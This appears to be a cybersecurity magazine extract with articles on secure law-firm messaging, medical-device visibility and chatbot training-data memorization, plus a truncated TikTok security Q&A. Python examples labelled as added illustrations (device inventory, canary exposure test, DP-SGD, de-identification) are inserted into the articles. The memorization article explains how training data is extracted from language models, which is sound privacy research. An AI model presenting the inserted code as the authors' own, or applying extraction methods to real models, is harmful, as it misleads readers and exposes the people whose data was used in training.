The trend away from traditional face-to-face meetings with clients towards real-time messaging applications like WhatsApp and Zoom risks highly sensitive information being shared on a less secure, open platform. There are many media reports of attacks on consumer-oriented platforms, such as the Pegasus spyware, which was delivered through a WhatsApp vulnerability in 2019 and later through zero-click iMessage exploits. One caveat applies to any messaging product, Salt included: Pegasus compromises the handset itself, and once an endpoint is compromised, no application's encryption protects what is typed or displayed on it, so device hygiene and patching remain part of the control. If you fear a hack by malign actors, whether motivated by political, economic, personal, or ethical reasons, it is essential to protect the firm's internal and external communications from attack and exploitation, to protect both the value of the information and your attorney-client privilege.
Overall, if you are not certain that your message reaches only the people who need to know, consider modifying your communication delivery strategy to alleviate or reduce your concerns. Through a dedicated Management Portal, Salt allows you to create closed, private communication groups between you, your colleagues, and your clients. No uninvited user can contact you via Salt, which keeps unsolicited messages, a common delivery path for phishing and exploit payloads, off the platform. You have control and can be seen to protect your clients and internal communications.
At Salt Communications we work with law firms of all sizes around the world to enable them to have secure, confidential discussions wherever they are, at any time.
To discuss this article in greater detail with the team, or to sign up for a free trial of Salt Communications, contact us at info@saltcommunications.com or visit our website at saltcommunications.com.
About Salt Communications:
Salt Communications is a multi-award winning cyber security company providing a fully enterprise-managed software solution giving absolute privacy in mobile communications. It is easy to deploy and uses multi-layered encryption techniques to meet the highest of security standards. Salt Communications offers 'Peace of Mind' for organisations who value their privacy, by giving them complete control and secure communications, to protect their trusted relationships and stay safe. Salt is headquartered in Belfast, N. Ireland; for more information visit Salt Communications.
About the Author
Nicole Allen, Marketing Executive at Salt Communications. Nicole has been working within the Salt Communications marketing team for several years and has played a crucial role in building Salt Communications' reputation. Nicole implements many of Salt Communications' digital efforts as well as managing the company's presence at events, both virtual and in person.
Nicole can be reached online via LinkedIn, Twitter, or by emailing nicole.allen@saltcommunications.com, and at our company website https://saltcommunications.com/
The Line-of-Sight Cybersecurity Problem in Healthcare
Why device visibility is hard to get but so worth it
By Samuel Hill, Director of Product Marketing, Medigate
The pandemic shed light on a big problem in healthcare. Most healthcare delivery organizations (HDOs) don't accurately know their clinical assets, where they're located, and whether they're being used efficiently. The frantic search for ventilators, IV pumps, and other critical equipment needed to treat COVID-19 patients highlighted the issue, but it's a problem that's been around for quite a while.
Every now and again, there's a story about nurses looking for and hiding equipment so they know where something is when they need it. MedWrench reports "up to 40% of healthcare technology management staff (HTM) time is spent on non-value-added work such as: searching for equipment, assessing unbroken assets due to operator error, and juggling the details of multiple vendor contracts."
And it’s only getting worse. If you’re wondering how big this problem really is, consider that there are<br />
approximately 15 million medical devices in U.S. hospitals today, with billions of IoMT devices, experts<br />
believe, on the way. There’s no easy fix because highly detailed device information is extremely difficult<br />
to come by.<br />
Data silos and disconnects<br />
Traditional computerized maintenance management systems (CMMS), which help healthcare delivery<br />
organizations (HDOs) track and manage their inventory, aren’t actually connected to the devices they<br />
manage and don’t have access to live traffic, so they don’t consistently know location, utilization, or other<br />
vital device details. IT asset management (ITAM) and configuration management databases (CMDB),<br />
which organizations use to track and manage their IT assets, don’t offer much relief. While they can<br />
dynamically capture information on the networked assets in the environment, they lack visibility into and<br />
understanding of medical devices. That is, they can tell you the IP address of a device, what ports it’s<br />
connecting to, and maybe even what type of device it is (e.g., an IV pump or an MRI machine); however,<br />
the classifications are often incorrect. They can’t tell you what modules are attached to a device (e.g., a<br />
syringe module on an IV pump). They can’t tell you anything about serially attached medical devices that<br />
don’t have an Ethernet connection. They can’t tell you what proprietary protocols are being used, what<br />
embedded software is on the device, how often that device is used, where it’s located, or whether there<br />
are any anomalies in the network traffic.<br />
As a result, BioMed, clinical engineering, and maintenance teams need to spend a lot of time trying to fill<br />
in their inventory gaps. Unfortunately, this usually means HTM staff are stuck wandering the halls to<br />
collect the needed information. It also means a lot of the data is outdated almost as soon as it’s captured,<br />
because most devices rarely remain in one place. This creates huge blind spots that can lead to costly<br />
and dangerous operational omissions.<br />
What are the risks to healthcare organizations?<br />
It may seem overblown to say that these informational holes pose a danger to a health system’s<br />
operations, but they do. Silos can lead to inefficient workflows, gaps in operational oversight, and other<br />
organizational risks. At best, if left unaddressed, these disconnects add costs and delays to the business<br />
that can make it challenging to offer connected care; at worst, they can generate failures or disruptions<br />
in care which affect a health system’s integrity, reputation, and long-term economic viability.<br />
Getting specific about what HDOs need in device visibility and insights<br />
CMMS data deficits must be resolved quickly, accurately, and continuously. Creating a single source of<br />
device data truth goes a long way to supporting ongoing risk abatement and workflow efficiencies that<br />
help keep operations secure. To achieve this, HDOs need to feed their CMMS dynamic information and<br />
validate it against existing CMMS data fields. This dynamic information should include specific details on<br />
the device model, make, OS version, network status, security posture, utilization, and location.<br />
Therefore, data solutions need to apply advanced deep packet inspection (DPI) techniques combined<br />
with deep medical expertise, so they can identify and capture relevant device details and consider the<br />
clinical context in which these devices are operating. Clinical context, after all, is crucial because medical<br />
devices are not like other IT devices.<br />
For example, most clinical devices are closed systems, and AV or security agents cannot be installed<br />
on them to protect them. They run proprietary or legacy software that can’t be patched unless approved<br />
and authorized by the manufacturer. This means vulnerabilities may persist, and devices may be open to<br />
exploitation for the duration of the patch/fix process. They also often use proprietary or clinical protocols<br />
to communicate, so to identify activity that could pose a threat, these protocols need to be fluently<br />
understood.<br />
Since most clinical devices serve a specific function and act in a predictable way, they’re much more<br />
predictable than general computer systems controlled by people. However, this is only useful if the<br />
workflows and manufacturer-defined behaviors of the specific device are known. HDOs are unique<br />
because they require solutions with a level of knowledge that doesn’t produce a lot of false alarms on<br />
activity that is perfectly normal (and necessary) for a medical device’s operation.<br />
Probably the most important (and somewhat obvious) thing to be mindful of is that clinical devices are<br />
used in procedures and treatment plans, so protective measures cannot be disruptive. If access to a<br />
ventilator is blocked, or an IV pump is prevented from communicating with a patient monitor simply<br />
because it was moved, powered up, or made a new connection, an unnecessary point of failure is<br />
introduced that can impact patient care and outcomes. All these things need to be considered and<br />
accommodated in device management and security decisions.<br />
The benefits are great<br />
When HDOs have real-time visibility and insights into their inventory, they can start to streamline and<br />
mature their security, BioMed, and IT workflows to lower risks and costs. For instance, they can use<br />
device location and utilization information to understand front-line care team preferences, improve patch<br />
planning, and optimize asset distribution, which can ultimately generate significant CAPEX and OPEX<br />
benefits.<br />
With a wide-angle view of where devices are used, HDOs can determine when to purchase new<br />
equipment or even reallocate devices from under-utilized locations to optimize capacity and meet needs.<br />
They can consider the risk posture of devices in their buying, renting, and leasing decisions; automate<br />
vulnerability correlation to pinpoint impacted devices (e.g., those with an OS version-specific problem,<br />
outdated firmware, a vulnerable application entity, etc.); and trigger associated remediation work orders<br />
that reduce the overall risk to operations.<br />
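To make the passive-visibility idea above concrete (DPI-derived inventory, a baseline of manufacturer-defined behaviour that never blocks clinical traffic, and vulnerability correlation that turns into work orders), here is an added Python example. It is not Medigate's code or product logic. Every IP address, model name, port, firmware version and advisory identifier in it is constructed for illustration, as is the shape of the flow records a DPI sensor would emit.<br />

```python
"""Passive medical-device inventory, alert-only behaviour baseline and
vulnerability correlation.  Added illustration, not Medigate's code; every
IP address, model, port, firmware version and advisory ID is constructed."""
from dataclasses import dataclass, field

# Constructed flow records in the shape a passive DPI sensor might emit:
# (timestamp, src_ip, dst_ip, dst_port, app_protocol, identification_banner)
FLOWS = [
    (1, "10.1.1.10", "10.1.9.5", 104, "DICOM", "VENDORX-CT fw=2.3.1"),
    (2, "10.1.1.10", "10.1.9.5", 104, "DICOM", "VENDORX-CT fw=2.3.1"),
    (3, "10.1.1.21", "10.1.9.8", 2575, "HL7", "VENDORY-PUMP fw=1.0.4"),
    (4, "10.1.1.21", "10.1.9.8", 2575, "HL7", "VENDORY-PUMP fw=1.0.4"),
    (5, "10.1.1.21", "10.1.9.8", 2575, "HL7", "VENDORY-PUMP fw=1.0.4"),
    # Constructed anomaly: the pump opens TLS to an address outside the clinical subnet.
    (6, "10.1.1.21", "203.0.113.7", 443, "TLS", "VENDORY-PUMP fw=1.0.4"),
]

# Manufacturer-defined expected behaviour per model (constructed): the
# application protocols a model should speak and the subnets it should talk to.
EXPECTED = {
    "VENDORX-CT": {"protocols": {"DICOM"}, "dst_prefixes": ("10.1.9.",)},
    "VENDORY-PUMP": {"protocols": {"HL7"}, "dst_prefixes": ("10.1.9.",)},
}

# Constructed advisory: affected model and the first fixed firmware version.
ADVISORIES = [
    {"id": "ADV-EXAMPLE-001", "model": "VENDORY-PUMP", "fixed_in": "1.1.0"},
]


@dataclass
class Device:
    ip: str
    model: str
    firmware: str
    protocols: set = field(default_factory=set)
    peers: set = field(default_factory=set)
    last_seen: int = 0
    flows: int = 0  # crude utilisation signal: observed sessions


def parse_banner(banner):
    """Split 'MODEL fw=X.Y.Z' into (model, firmware)."""
    model, _, firmware = banner.partition(" fw=")
    return model, firmware


def build_inventory(flows):
    """Fold passive observations into one record per source device."""
    inventory = {}
    for ts, src, dst, _port, proto, banner in flows:
        model, firmware = parse_banner(banner)
        dev = inventory.setdefault(src, Device(src, model, firmware))
        dev.protocols.add(proto)
        dev.peers.add(dst)
        dev.last_seen = max(dev.last_seen, ts)
        dev.flows += 1
    return inventory


def baseline_alerts(inventory):
    """Compare each device with its model's expected behaviour.  Alert-only:
    nothing is blocked, because a false positive on a pump or ventilator is a
    patient-safety risk; findings go to a human review queue instead."""
    alerts = []
    for dev in inventory.values():
        expected = EXPECTED.get(dev.model)
        if expected is None:
            alerts.append((dev.ip, "unknown model", dev.model))
            continue
        for proto in dev.protocols - expected["protocols"]:
            alerts.append((dev.ip, "unexpected protocol", proto))
        for peer in dev.peers:
            if not peer.startswith(expected["dst_prefixes"]):
                alerts.append((dev.ip, "unexpected peer", peer))
    return sorted(alerts)


def version_tuple(version):
    return tuple(int(part) for part in version.split("."))


def correlate_vulns(inventory):
    """Match inventory firmware against advisories and emit work orders."""
    work_orders = []
    for adv in ADVISORIES:
        for dev in inventory.values():
            if dev.model == adv["model"] and version_tuple(dev.firmware) < version_tuple(adv["fixed_in"]):
                work_orders.append({"device": dev.ip, "advisory": adv["id"],
                                    "current": dev.firmware, "target": adv["fixed_in"]})
    return work_orders


if __name__ == "__main__":
    inv = build_inventory(FLOWS)
    for alert in baseline_alerts(inv):
        print("ALERT", alert)
    for order in correlate_vulns(inv):
        print("WORK ORDER", order)
```

Running it lists one device that behaves exactly as its model should (the CT scanner) and one that does not (the pump, which is also behind the advisory's fixed firmware), so the two outputs a BioMed team actually needs are produced from the same passive data: a reviewable alert and a remediation work order.<br />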
Automating device data collection and management routines allows HDOs to make data-driven decisions<br />
that strengthen their security posture, improve the lifecycle of their fleet, and drive operational savings.<br />
It’s essential not only for the sanity of HTM staff (no more frantic searches for equipment) but also for<br />
the HDO at large – benefiting their patients, balance sheet, and ongoing operations.<br />
About the Author<br />
Samuel is the Director of Product Marketing for Medigate.<br />
Before working in technology, he spent seven years as an<br />
emergency room tech for two different health systems and lived<br />
through an EHR transition twice! He is a husband to one, father<br />
to four, and lives on a rural island near Seattle, WA when he is<br />
not camping. He holds a B.A. from Pacific Lutheran University<br />
and an M.A. in Strategic Leadership from Life Pacific University.<br />
Samuel Hill can be reached online at samuel@medigate.io or @samueljhill and at our company website<br />
http://www.medigate.io<br />
Caution: Personal Data Memorization in Progress<br />
How a Korean chatbot’s privacy scandal can inform your chatbot’s privacy success<br />
By Patricia Thaine, Co-Founder & CEO, Private AI<br />
On April 2nd, 2021, SLATE published a story titled A South Korean Chatbot Shows Just How Sloppy<br />
Tech Companies Can Be With User Data. It covered a privacy breach by ScatterLab, a South Korean<br />
chatbot company that was “accused [...] of collecting intimate conversations between lovers without<br />
informing the users and then using the data to build a conversational A.I. chatbot” (source). This incident,<br />
in which the chatbot was “exposing people’s names, nicknames, and home addresses in its responses”<br />
(source), happened despite warnings from the privacy and Natural Language Processing (NLP) research<br />
community that language models (which are used in chatbots, automatic speech recognition, sentiment<br />
analysis and countless other NLP tasks) memorize rare information within their training data. Previously,<br />
“ScatterLab had boasted about its large dataset of 10 billion intimate conversation logs” (source).<br />
4 Pillars of Privacy-Preserving AI<br />
Understanding the privacy challenges that chatbots face requires, first and foremost, a general<br />
understanding of the privacy challenges that machine learning systems face in general. There are<br />
four pillars to privacy-preserving AI:<br />
1) Training data privacy: making sure that you can’t reconstruct sensitive or personal information<br />
within the training data,<br />
2) Input privacy: privacy of the individual whose data you’re inferring upon,<br />
3) Model weights privacy: privacy of the model of a particular corporation, institution, or individual<br />
who created it. This is about IP protection, but also training data privacy, since it is possible to<br />
determine information about the training data from model weight updates,<br />
4) Output privacy: also about protecting the privacy of the individual whose data you’re inferring<br />
upon.<br />
By collecting private conversations with identifiable individuals and training their models on them,<br />
ScatterLab first violated (2) input privacy, then (1) training data privacy, and possibly (4) output privacy.<br />
Training Data Privacy<br />
Much of research and development these days focuses on training data privacy, in part because of how<br />
likely deep learning models are to memorize training data, with the potential of spewing it out in production<br />
to unknown parties. The secret sharer: Evaluating and testing unintended memorization in neural<br />
networks [Nicholas Carlini, Chang Liu, Úlfar Erlingsson, Jernej Kos, and Dawn Song. 2019. The<br />
secret sharer: Evaluating and testing unintended memorization in neural networks. In 28th<br />
USENIX Security Symposium, pages 267–284, Santa Clara, CA. USENIX Association.] by Carlini et<br />
al. (2019) is a pivotal paper discussing the problem. They placed a fake social security number into the<br />
Penn Treebank dataset as a canary and then trained a character language model on the dataset. They<br />
then measured the perplexity of various sequences of numbers and found that the model was less<br />
surprised to see the sequence of numbers that made up the canary; i.e., the language model had<br />
learned that it was more likely to encounter the canary than other random numbers, given the<br />
training data. This is a problem because it shows that the language model memorized the secret.<br />
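The canary test just described can be reproduced in miniature. The following is an added Python example, not code from the paper or from Private AI: a constructed chat-style corpus is trained with and without a canary sentence containing a constructed "account number", a smoothed character trigram model stands in for the neural language model, and the canary's rank among random candidates sharing the same template gives the exposure value of Carlini et al. (log2 of the candidate space minus log2 of the canary's rank). The corpus, template and secret are all constructed; the rank is estimated from a random sample because the candidate space is too large to enumerate.<br />

```python
"""Canary-based memorization test for a character language model.

Added example illustrating the secret-sharer methodology; this is not code
from the paper or from Private AI.  The corpus, the canary and the model (an
add-one smoothed character trigram model in place of a neural LM) are all
constructed for illustration.
"""
import math
import random

DIGITS = "0123456789"

# Constructed chat-style training corpus.  Only the canary line carries a
# secret; the shared template makes every candidate directly comparable.
CORPUS = [
    "hey are you free tonight",
    "yes lets meet at the usual place",
    "the meeting is at 9 pm in room 12",
    "i forgot my keys again",
    "can you send me the address later",
]
TEMPLATE = "my account number is {}"
CANARY_SECRET = "27154903"  # constructed value, not a real account number
CANARY = TEMPLATE.format(CANARY_SECRET)


def train_char_model(lines, n=3):
    """Add-one smoothed character n-gram model: P(ch | previous n-1 chars)."""
    counts, ctx_counts = {}, {}
    vocab = set(DIGITS)
    for line in lines:
        vocab.update(line)
        padded = " " * (n - 1) + line
        for i in range(n - 1, len(padded)):
            ctx, ch = padded[i - n + 1:i], padded[i]
            counts[(ctx, ch)] = counts.get((ctx, ch), 0) + 1
            ctx_counts[ctx] = ctx_counts.get(ctx, 0) + 1
    return {"n": n, "counts": counts, "ctx": ctx_counts, "V": len(vocab)}


def log_perplexity(model, text):
    """Average bits per character the model needs to explain `text`."""
    n, V = model["n"], model["V"]
    padded = " " * (n - 1) + text
    bits = 0.0
    for i in range(n - 1, len(padded)):
        ctx, ch = padded[i - n + 1:i], padded[i]
        p = (model["counts"].get((ctx, ch), 0) + 1) / (model["ctx"].get(ctx, 0) + V)
        bits -= math.log2(p)
    return bits / len(text)


def exposure(model, secret, template, samples=2000, seed=0):
    """Exposure = log2|R| - log2(rank of the canary among all candidates R that
    share the template).  |R| = 10**len(secret), so the rank is estimated from
    a random sample: candidates the model finds at least as likely as the
    canary count against it."""
    rng = random.Random(seed)
    target = log_perplexity(model, template.format(secret))
    at_least_as_likely = 0
    for _ in range(samples):
        candidate = "".join(rng.choice(DIGITS) for _ in secret)
        if log_perplexity(model, template.format(candidate)) <= target:
            at_least_as_likely += 1
    space = 10 ** len(secret)
    est_rank = 1 + at_least_as_likely * space / samples
    return math.log2(space) - math.log2(est_rank)


def run_test(canary_copies=3):
    """Train without and with the canary; return (clean, leaky) exposures."""
    clean = train_char_model(CORPUS)
    leaky = train_char_model(CORPUS + [CANARY] * canary_copies)
    return exposure(clean, CANARY_SECRET, TEMPLATE), exposure(leaky, CANARY_SECRET, TEMPLATE)


if __name__ == "__main__":
    clean_exposure, leaky_exposure = run_test()
    print("exposure without canary in training: %.2f bits" % clean_exposure)
    print("exposure with canary in training:    %.2f bits" % leaky_exposure)
```

With the canary absent from training, its exposure stays near zero (most random digit strings are just as plausible to the model); once the canary has been trained on, its exposure climbs to the full log2 of the candidate space, meaning the model ranks the secret above every random alternative. The same measurement, applied to a real chatbot model with canaries planted in its fine-tuning data, is the pre-release check that would have flagged the memorization described above.<br />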
Another paper titled Extracting training data from large language models by Carlini et al. (2020)<br />
demonstrates how GPT-2 was actually memorizing data from the pre-training dataset. [Nicholas Carlini,<br />
Florian Tramer, Eric Wallace, Matthew Jagielski, Ariel Herbert-Voss, Katherine Lee, Adam<br />
Roberts, Tom Brown, Dawn Song, Ulfar Erlingsson, et al. 2020. Extracting training data from large<br />
language models. arXiv preprint arXiv:2012.07805.] It had memorized addresses, names, and other<br />
information that could be considered sensitive had the data not been publicly available. It is important<br />
to keep in mind that these very models will memorize the same kind of information from chatbot<br />
training data. The paper showed that an extra-large GPT-2 model already started memorizing information<br />
after seeing only 33 examples.<br />
Privacy issues have also been raised about training non-contextual word embeddings on data containing<br />
sensitive information, in Exploring the privacy-preserving properties of word embeddings: Algorithmic<br />
validation study by Abdalla et al. (2020) [Mohamed Abdalla, Moustafa Abdalla, Graeme Hirst, and<br />
Frank Rudzicz. 2020. Exploring the privacy-preserving properties of word embeddings:<br />
Algorithmic validation study. J Med Internet Res.].<br />
There are four types of disclosure concerns when it comes to protecting data privacy:<br />
● Identity disclosure: identifying an individual.<br />
● Attribute disclosure: identifying an individual’s ethnicity, religion, physical attributes, etc.<br />
● Group attribute disclosure: e.g., is a particular group more likely to have cancer?<br />
● Membership disclosure: e.g., is this person part of a pharmaceutical trial?<br />
Not all attributes are the same with regard to increasing the risk of these disclosures. Within<br />
conversations with chatbots, users might reveal direct identifiers (e.g., full names, exact addresses,<br />
phone numbers, credit card numbers) and quasi-identifiers (e.g., religion, origin, gender, etc.). When<br />
quasi-identifiers are combined, the risk of re-identifying an individual grows exponentially.<br />
The ScatterLab incident mentioned above is an example of identity and possibly attribute disclosure,<br />
though one major issue was actually membership disclosure through identity disclosure. These<br />
disclosure types were caused by the leak of direct identifiers and perhaps of quasi-identifiers as well.<br />
Preventing Identity, Attribute, and Membership Disclosures<br />
There are a few solutions for dealing with training data memorization within chatbots. One is differentially<br />
private gradient descent (DPGD), which was used in Carlini et al.’s 2019 paper. DPGD adds noise to the<br />
ML model training process. The original idea behind differential privacy is to be able to make<br />
generalizations about a population without the risk of disclosing any specific individual’s unique<br />
information. The goal of adding differential privacy to an algorithm, like a chatbot model, is that if you run<br />
the algorithm on two datasets differing by a single entry, then the likelihood of getting a different set of<br />
possible outputs is negligible. DPGD provides mathematical guarantees that rare information is not being<br />
memorized by a machine learning model, though often at the expense of model utility.<br />
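The mechanism behind "adds noise to the training process" is easier to see in code than in prose. Below is an added, pure-Python illustration of one differentially private gradient descent step (per-example gradient clipping, then Gaussian noise scaled to the clipping bound) on a constructed toy logistic-regression task. It is not code from Carlini et al. or from Private AI, the data set is constructed, and the (ε, δ) accounting that turns a noise multiplier and a step count into a privacy budget is deliberately left out, so the numbers it prints illustrate the mechanism rather than state a guarantee.<br />

```python
"""One DP-SGD update, written out in pure Python on a toy model.

Added illustration of the clipping-plus-noise mechanism; not code from
Carlini et al. or Private AI.  Data set is constructed; privacy accounting
(turning sigma and the number of steps into epsilon/delta) is not included.
"""
import math
import random


def make_dataset(n=200, seed=1):
    """Constructed 2-D points labelled by the sign of x0 + x1."""
    rng = random.Random(seed)
    data = []
    for _ in range(n):
        x = (rng.uniform(-1, 1), rng.uniform(-1, 1))
        data.append((x, 1.0 if x[0] + x[1] > 0 else 0.0))
    return data


def per_example_gradient(w, b, x, y):
    """Gradient of the logistic loss for one example: (dw0, dw1, db)."""
    z = w[0] * x[0] + w[1] * x[1] + b
    p = 1.0 / (1.0 + math.exp(-z))
    err = p - y
    return [err * x[0], err * x[1], err]


def clip_gradient(g, clip_norm):
    """Scale a gradient so its L2 norm is at most clip_norm.  This bounds the
    influence any single training example can have on the update, which is
    what makes the later noise meaningful."""
    norm = math.sqrt(sum(v * v for v in g))
    if norm <= clip_norm or norm == 0.0:
        return list(g)
    return [v * clip_norm / norm for v in g]


def dp_sgd_step(w, b, batch, clip_norm, noise_multiplier, lr, rng):
    """Clip each example's gradient, sum, add Gaussian noise with standard
    deviation noise_multiplier * clip_norm, average, and take the step."""
    total = [0.0, 0.0, 0.0]
    for x, y in batch:
        g = clip_gradient(per_example_gradient(w, b, x, y), clip_norm)
        for i in range(3):
            total[i] += g[i]
    noisy = [t + rng.gauss(0.0, noise_multiplier * clip_norm) for t in total]
    step = [v / len(batch) for v in noisy]
    return [w[0] - lr * step[0], w[1] - lr * step[1]], b - lr * step[2]


def accuracy(w, b, data):
    correct = 0
    for x, y in data:
        z = w[0] * x[0] + w[1] * x[1] + b
        correct += int((z > 0) == (y == 1.0))
    return correct / len(data)


def train_dp(data, steps=300, clip_norm=1.0, noise_multiplier=1.0, lr=0.5, seed=7):
    """Full-batch DP-SGD on the toy task; returns the learned (w, b)."""
    rng = random.Random(seed)
    w, b = [0.0, 0.0], 0.0
    for _ in range(steps):
        w, b = dp_sgd_step(w, b, data, clip_norm, noise_multiplier, lr, rng)
    return w, b


if __name__ == "__main__":
    data = make_dataset()
    w, b = train_dp(data)
    print("weights", w, "bias", b, "train accuracy", accuracy(w, b, data))
```

On this easy task the noisy model still separates the classes well, which is the point of the trade-off the paragraph describes: clipping and noise cost some utility, and how much depends on the noise multiplier, the batch size and the number of steps; raising the noise multiplier or shrinking the batch makes the utility loss visible quickly.<br />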
Another solution is highly accurate redaction or de-identification, which means removing the direct<br />
identifiers and quasi-identifiers within your training data (e.g., location, names, telephone numbers, etc.).<br />
There’s a lot you can gather from a conversation’s context without the need for identifiable information.<br />
Finally, another option is synthetic personal data generation. This method allows for the replacement<br />
of direct and quasi-identifiers in a very natural way, so a chatbot’s training data matches the style of the<br />
language model’s pre-training dataset, which prevents downstream model accuracy loss. It also has the<br />
additional benefit that, if any personally identifiable information is missed, it’s very difficult to tell what<br />
the original data was from the synthetic data. Targeted synthetic data generation changes the paradigm<br />
of disclosure risk versus data utility.<br />
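The redaction and synthetic-replacement options just described share one pipeline: find the identifiers, then replace each with a surrogate that keeps the format of the original. The following is an added Python example, not Private AI's code. Detection uses plain regular expressions plus a constructed name lexicon standing in for a trained NER model; surrogates are derived through an HMAC keyed with a secret, so the same identifier always maps to the same synthetic value within one key (the conversation stays coherent) while the mapping cannot be reversed without that key. The sample message, the key, and all lexicon entries are constructed.<br />

```python
"""Pattern-based de-identification with consistent, format-preserving
synthetic surrogates.  Added illustration, not Private AI's code; the name
lexicon stands in for an NER model and every sample value is constructed."""
import hashlib
import hmac
import random
import re

# Constructed name lexicon (a production system would use a trained NER model).
NAME_LEXICON = {"alice", "bob", "carol", "dave"}
SURROGATE_NAMES = ["Ingrid", "Mateo", "Priya", "Tomas", "Yara", "Kenji", "Lena", "Omar"]

# One alternation, tried in this order, so each span is matched exactly once.
PATTERNS = [
    ("EMAIL", r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    ("CARD", r"\b(?:\d{4}[ -]){3}\d{4}\b"),
    ("PHONE", r"(?:\+?1[ -])?(?:\(\d{3}\)|\d{3})[ -]\d{3}-\d{4}\b"),
    ("SSN", r"\b\d{3}-\d{2}-\d{4}\b"),
    ("NAME", r"\b[A-Z][a-z]+\b"),
]
COMBINED = re.compile("|".join("(?P<%s>%s)" % (label, pat) for label, pat in PATTERNS))


def luhn_ok(number):
    """Luhn checksum, used to drop digit runs that are not card numbers."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def _rng_for(label, value, key):
    """Deterministic RNG per (label, value) seeded through an HMAC: the same
    identifier maps to the same surrogate under one key, and the mapping cannot
    be inverted without the key."""
    digest = hmac.new(key, ("%s:%s" % (label, value)).encode(), hashlib.sha256).digest()
    return random.Random(int.from_bytes(digest[:8], "big"))


def surrogate(label, value, key):
    """Format-preserving synthetic replacement drawn from ranges that are never
    assigned to real people (555-01xx numbers, the 000 SSN area, a non-Luhn PAN)."""
    rng = _rng_for(label, value, key)
    if label == "EMAIL":
        return "user%04d@example.com" % rng.randrange(10000)
    if label == "PHONE":
        return "555-01%02d" % rng.randrange(100)
    if label == "SSN":
        return "000-00-%04d" % rng.randrange(10000)
    if label == "CARD":
        return "0000 0000 0000 %04d" % rng.randrange(10000)
    return rng.choice(SURROGATE_NAMES)


def deidentify(text, key):
    """Return (de-identified text, list of (label, original) findings)."""
    findings = []

    def replace(match):
        label = match.lastgroup
        value = match.group(label)
        if label == "NAME" and value.lower() not in NAME_LEXICON:
            return value  # capitalised word that is not a known name
        if label == "CARD" and not luhn_ok(value):
            return value  # digit run that fails the card checksum
        findings.append((label, value))
        return surrogate(label, value, key)

    return COMBINED.sub(replace, text), findings


# Constructed chat message; every identifier in it is fictitious.
SAMPLE = ("Hi, I'm Alice. Call me at 415-555-2671 or alice@example.org; my card is "
          "4111 1111 1111 1111 and my SSN is 123-45-6789. Thanks, Alice")

if __name__ == "__main__":
    cleaned, found = deidentify(SAMPLE, b"constructed-demo-key")
    print(cleaned)
    print([label for label, _ in found])
```

Two properties matter for training data: both occurrences of the name become the same surrogate, so the dialogue still reads as one person talking, and re-running with a different key yields different surrogates, so a leaked key-less mapping reveals nothing. Quasi-identifiers such as religion or origin are not caught by patterns like these; that is the part of the problem where the accuracy of the detector decides the residual risk.<br />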
If ScatterLab had used any one of these three methods to protect the privacy of their users, they would<br />
have avoided violating training data privacy, as well as input and output privacy. Their story inspires<br />
concern and a desire to be cautious. But it is not enough to just want to be proactive about user<br />
privacy: actions must be taken to integrate privacy into a chatbot’s very design.<br />
About the Author<br />
Patricia Thaine is the Co-Founder and CEO of Private AI, a<br />
Toronto- and Berlin-based startup creating a suite of privacy<br />
tools that make it easy to comply with data protection<br />
regulations, mitigate cybersecurity threats, and maintain<br />
customer trust.<br />
She is a Computer Science PhD Candidate at the University of<br />
Toronto and a Postgraduate Affiliate at the Vector Institute doing<br />
research on privacy-preserving natural language processing,<br />
with a focus on applied cryptography. Her research interests also include computational methods for lost<br />
language decipherment.<br />
Patricia is a recipient of the NSERC Postgraduate Scholarship, the RBC Graduate Fellowship, the<br />
Beatrice “Trixie” Worsley Graduate Scholarship in Computer Science, and the Ontario Graduate<br />
Scholarship. She has nine years of research and software development experience, including at the<br />
McGill Language Development Lab, the University of Toronto's Computational Linguistics Lab, the<br />
University of Toronto's Department of Linguistics, and the Public Health Agency of Canada.<br />
She is also a member of the Board of Directors of Equity Showcase, one of Canada's oldest not-for-profit<br />
charitable organizations. Patricia Thaine can be reached online at patricia@private-ai.com, @PrivateNLP<br />
and at our company website https://www.private-ai.com.<br />
Q&A: Roland Cloutier, Chief Security Officer, TikTok and<br />
ByteDance<br />
By Roland Cloutier<br />
As Global Chief Security Officer of ByteDance and TikTok, Roland Cloutier brings an unprecedented<br />
understanding and knowledge of global protection and security leadership to one of the world's leading<br />
media, social, and technology companies. He oversees the company’s information protection, risk,<br />
workforce protection, crisis management, and investigative-security operations worldwide. Before joining<br />
ByteDance and TikTok in 2020, Cloutier spent about 10 years as CSO at payroll-services firm ADP. Prior<br />
to ADP, he was CSO at data-storage vendor EMC (now owned by Dell). Cloutier started his career with<br />
over a decade of service to the US Air Force and US Depts. of Defense and Veterans Affairs. In 2015,<br />
he authored and published a business book, “Becoming a Global Chief Security Executive Officer.”<br />
You recently launched the #BeCyberSmart campaign at TikTok as a part of Cybersecurity<br />
Awareness Month. What was the driver for doing this?<br />
At TikTok, we believe everyone benefits from a safer and more secure world. For Cybersecurity<br />
Awareness Month and all year long, we're inspiring our diverse global community to make good choices<br />
and stay safe online. That’s why we launched #BeCyberSmart, a campaign championed by the National<br />
Cyber Security Alliance (NCSA) and industry-leading experts on how we can all create a culture of<br />
cybersecurity. We're always inspired by creators fueling #LearnOnTikTok, and it was exciting to launch<br />
a new @TikTokTips video series on ways to spot and defend against common cyberthreats. The series<br />
features TikTok creators and employees, including touring comedian @alex_falcone telling tales of<br />
cybercrimes and how to #BeCyberSmart.<br />
We also want to uplift the next generation of leaders. While the pandemic hit many industries hard,<br />
cybersecurity skills have never been needed more. Over 3 million cybersecurity jobs went unfilled last<br />
year. We’re providing tools, training, and encouragement to inspire more people to get into cybersecurity.<br />
We've also been strengthening our security team at TikTok.<br />
We're actively recruiting for over 300 roles across 19 different disciplines, because securing a platform<br />
that brings joy to over 1 billion people is a job that's never done.<br />
Ransomware attacks have significantly driven cybersecurity’s public profile. How have you<br />
seen this impacting internal support for cybersecurity initiatives, budgets and overall<br />
awareness with businesses?<br />
Ransomware attacks have surged 311% in the past year, with a business now being attacked every 11<br />
seconds, and the threat landscape is constantly evolving. At TikTok, the safety and security of our global<br />
community is always a top priority. We know that staying ahead of next-generation cyber threats requires<br />
bolstering the security and integrity of our platform and business operations on an ongoing basis. Critical<br />
to that effort is partnering with the world's best researchers, academic scholars, and independent experts<br />
to test and validate our own defense.<br />
In the past year alone, we've strengthened our global security organization and established global Fusion<br />
Center operations in Washington DC, Dublin, and Singapore. We’ve earned ISO 27001 certifications in<br />
